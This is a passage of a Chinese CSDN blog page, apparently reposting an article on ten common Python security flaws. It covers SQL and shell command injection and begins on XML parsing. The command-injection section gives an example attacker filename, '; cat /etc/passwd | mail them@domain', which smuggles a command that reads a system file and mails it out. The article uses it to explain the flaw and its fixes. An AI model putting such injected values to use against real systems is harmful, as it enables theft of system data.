python程序编写应注意哪些问题_Python的安全问题,你必须注意!总结的10个Python常见安全漏洞...

最新推荐文章于 2022-02-14 14:23:46 发布
最新推荐文章于 2022-02-14 14:23:46 发布
阅读量133 收藏
点赞数
文章标签: python程序编写应注意哪些问题

编写安全的代码很困难,当你学习一门编程语言、一个模块或框架时,你会

学习其使用方法。在考虑安全性时,你需要考虑如何避免代码被滥用,

Python

也不例外,

即使在标准库中,也存在着许多糟糕的实例。然而,许多

Python

开发人员却根本不知道

这些。

以下是我总结的

10

Python

常见安全漏洞,排名不分先后。

1

、输入注入

注入攻击影响广泛且很常见,注入有很多种类,它们影响所有的语言、框架和环境。

SQL

注入是直接编写

SQL

查询(而非使用

ORM

时将字符串与变量混合。我读过很

多代码,其中“引号字符转义”被认为是一种修复,但事实并非如此,可以通过这个链接

https://netsparker/blog/web-security/sql-injection-cheat-sheet/

)查看

SQL

注入所有可能发

生的方式。

命令注入有可能在使用

popen

subprocess

os.system

调用一个进程并从变量中获取参数

时发生,当调用本地命令时,有人可能会将某些值设置为恶意值。

下面是个简单的脚本,使用用户提供的文件名调用子进程:

攻击者会将

filename

的值设置为“

; cat /etc/passwd | mail them@domain

或者其他同样危险

的值。

修复方法:

如果你使用了

Web

框架,可以用附带的实用程序对输入进行清理,除非有充分的理由,

否则不要手动构建

SQL

查询,大多数

ORM

都有内置的清理方法。

对于

shell

,可以使用

shlex

模块正确地转义输入。

2

、解析

XML

如果您的应用程序加载并解析

XML

文件,可能您正在使用一个

XML

标准库模块。有一

些针对

XML

的常见攻击。大多数为

DoS

风格(旨破坏系统而不是盗取数据)

。这些攻击

weixin_39759995
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python网络安全项目开发实战_利用Python监测漏洞_编程案例解析实例详解课程教程.pdf
04-27
任何软件和系统都没法保证百分之百的安全。但当某个软件发现了漏洞,它就会影响众多的使用者。对于这种情况,我们只能常看相关的论坛,积极地打补丁修补,没有什么更好的办法对。网络上公布的漏洞很多,只要发布新...
危险边缘:揭示 Python 编程中易被忽视的四个安全陷阱
最新发布
小助手爱编程
09-04 2477
在这个例子中,攻击者可以通过输入一个包含恶意代码的 URL,来控制我们的程序。在这个例子中,由于我们使用了一个存在漏洞的库,攻击者可能会通过这个漏洞获取到用户的明文密码,从而导致用户信息泄露。在这个例子中,我们没有对文件上传进行任何安全检查,攻击者可能会通过恶意文件上传,来执行服务器上的恶意代码。通过使用 urlparse 函数,我们可以确保输入的 URL 是合法的,从而避免代码注入的风险。同时,在处理文件上传时,我们需要确保文件上传的安全性,防止恶意文件上传导致系统受损。
编写python代码需要注意什么_python程序编写中需要注意的一些细节
weixin_36132709的博客
12-30 327
1.运行python,里面有一个参数文件text.txt,运行就报FileNotFoundError: [Errno 2] No such file or directory: 'test.txt'错误,查找原因,很多人都说是路径问题,后面查找很久,发现是电脑自动隐藏文件类型,所以简称的test文件就变成test.txt.txt,所以查找不到文件2.在使用def时,前面不能有空格,否则函数会报错,...
python编程注意事项_分享Python开发中要注意的十个注意事项
weixin_39952800的博客
01-30 292
不管是python开发还是其他什么语言的开发,如果在开发中我们能掌握一些有用的贴士和技巧,那么肯定会大大提高我们的开发效率,今天小编和大家分享的就是python开发中,一些初学这门语言常常会犯的错误,一起来看看吧。">大家请注意:这篇文中假设我们都用的是Python 31. 列表推导式你有一个list:bag = [1, 2, 3, 4, 5]现在你想让所有元素翻倍,让它看起来是这个样子: ...
Python的反编译与Python代码安全
weixin_30412167的博客
01-26 304
暂时发现Python的优点:   简单易学易上手(作为优秀脚本语言有的特质) 面向对象的支持 快速开发与调试 丰富且功能强大的各种功能库的支持 但是,作为脚本语言,基本上只要是能拿到pyc和pyo文件,便是等于拿到了源码,用uncompyle2反编译之后,缺少的只有一些注释。当然Python也是可以变异成exe或者是Linux的可执行文件的...
警惕 Python 中少为人知的十个安全陷阱
m0_54214980的博客
02-14 2573
Python 开发者们在使用标准库和通用框架时,都以为自己的程序具有可靠的安全性。然而,在 Python 中,就像在任何其它编程语言中一样,有一些特性可能会被开发者们误解或误用。通常而言,只有极少的微妙之处或细节会使开发者们疏忽大意,从而在代码中引入严重的安全漏洞。 在这篇博文中,我们将分享在实际 Python 项目中遇到的 10 个安全陷阱。我们选择了一些在技术圈中不太为人所知的陷阱。通过介绍每个问题及其造成的影响,我们希望提高人们对这些问题的感知,并提高大家的安全意识。如果你正在使用这些特性,请一
Python网络安全项目开发实战_看清文件上传木马_编程案例解析实例详解课程教程.pdf
04-27
在网络安全领域,文件上传木马是一个重要的议题,尤其在Python网络安全项目开发中。黑客常常利用文件上传漏洞来植入木马,以控制服务器。文件上传木马的类型主要分为大马和小马,根据文件大小来区分。小马通常用于...
ms08-067_check.rar_MS08-052_MS08067_MS08067 python_ms08-067_che
09-23
标题中的"ms08-067_check.rar_MS08-052_MS08067_MS08067 python_ms08-067_che"提及了几个关键术语,它们主要与微软安全更新和一个特定的漏洞检查工具相关。"ms08-067"指的是微软在2008年发布的一个关键安全更新,...
python-software-properties_0.82_all.rar_python
09-20
5. **安全性和稳定性**:作为官方发布的软件包,python-software-properties会定期更新以修复安全漏洞,保持系统的安全性和稳定性。同时,它遵循严格的版本控制和质量保证流程,确保了代码的质量。 在安装"python-...
Python技术使用问题及其解决方案总结.docx
07-30
1. **库的版本兼容性问题**:在使用Python时,不同库之间的版本冲突是常见问题。解决这个问题的方法包括创建虚拟环境(如venv或conda environments)来隔离各个项目的依赖,使用包管理工具pip进行版本控制,以及...
python代码安全问题_这个python代码对注入安全吗?
weixin_39870238的博客
01-14 264
我在Python中有一个服务器/客户机套接字对。服务器接收特定的命令,然后准备响并将其发送到客户端。在在这个问题中,我关心的只是代码中的可能的注入:如果可以要求服务器对第二个参数做一些奇怪的事情——如果对命令内容的控制不足以避免不希望发生的行为。在编辑:根据收到的建议在windows上调用check_output时添加了参数shell=True。不该是危险的,因为命令是一个普通的'dir'。在...
关于python安全性的问题
weixin_30840253的博客
11-01 945
收集总结了一下python安全方面的知识点以及近年来的相关漏洞,如果有需要修正或补充的地方,欢迎各位师傅的指出。 常见web漏洞在python中的示例。 xss python下的xss其原理跟php是一样的,django近年的例子如下: CVE-2017-12794,此例中通过抛出异常造成xss。 sql注入 一般来说使用django自带的操作数据库api是不会造成...
10个常见安全漏洞Python解决方法
实验楼
06-25 1406
关注「实验楼」,每天分享一个项目教程   用Python给你的项目打满补丁。正文共:3939 字 预计阅读时间:10 分钟‍1.输入注入注入攻击非常广泛而且很常见,注入有...
Python中的10个常见安全漏洞及修复方法
FHGFHFYUUGY的博客
09-04 385
编写安全代码很困难,当你学习一门编程语言、一个模块或框架时,你会学习其使用方法。在考虑安全性时,你需要考虑如何避免代码被滥用,Python也不例外,即使在标准库中,也存在着许多糟糕的实例。然而,许多 Python 开发人员却根本不知道这些。 以下为10个Python常见安全漏洞,排名不分先后。 1.输入输出 注入攻击影响广泛且很常见,注入有很多种类,它们影响所有的...
python练习3——请写一个密码安全性检查的脚本代码:check.py
biolxy的博客
06-24 6699
请写一个密码安全性检查的脚本代码:check.py  ,要求 #密码安全性检查代码 # # 低级密码要求: # 1. 密码由单纯的数字或字母组成 # 2. 密码长度小于等于8位 # # 中级密码要求: # 1. 密码必须由数字、字母或特殊字符(仅限:~!@#$%^&*()_=-/,.?<>;:[]{}|\)任意两种组合 # 2. 密码长度不能低于8位 # # 高级密码要求: #
python代码安全问题,了解Python Pickle不安全
weixin_39923623的博客
01-29 236
It states in the Python documentation that pickle is not secure and shouldn't parse untrusted user input. If you research this; almost all examples demonstrate this with a system() call via os.system...
在什么情况下、使用python类的使用-使用Python编程时的10个注意事项
weixin_37988176的博客
10-29 261
原标题:使用Python编程时的10个注意事项1、初始变化量在Python里,一个表达式中的名字在它被赋值之前是没法使用的。这是有意而为的:这样能避免一些输入失误,同时也能避免默认究竟该是什么类型的问题(0,None,””,[],?)。记住把计数器初始化为0,列表初始化为[],以此类推。2、从第一列开始确保把顶层的,未嵌套的代码放在最左边第一列开始。这包括在模块文件中未嵌套的代码,以及在交互提示...
告诉你要小心了呀!—Python中的安全
36245670的博客
09-26 3029
作为一门简单易学,且能快速进阶,以用来开发较为庞大和复杂的程序的编程语言,Python在计算环境中正在被广泛用。但是,它分外简洁和友好的语言风格也可能让软件工程师和系统管理者们放松警惕——一不小心就会出现代码错误,而这些错误可能会引起严重的安全后果。这篇文章主要向Python初学者介绍一些常见安全
Python网络安全项目开发实战_扫描漏洞_编程案例解析实例详解课程教程.pdf
04-27
"Python网络安全项目开发实战,通过扫描漏洞和编程案例解析来深入理解网络安全实践。" 在当前数字化时代,网络安全显得尤为重要,而Python语言因其强大的库支持和易读性,成为了网络安全领域中不可或缺的工具。本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值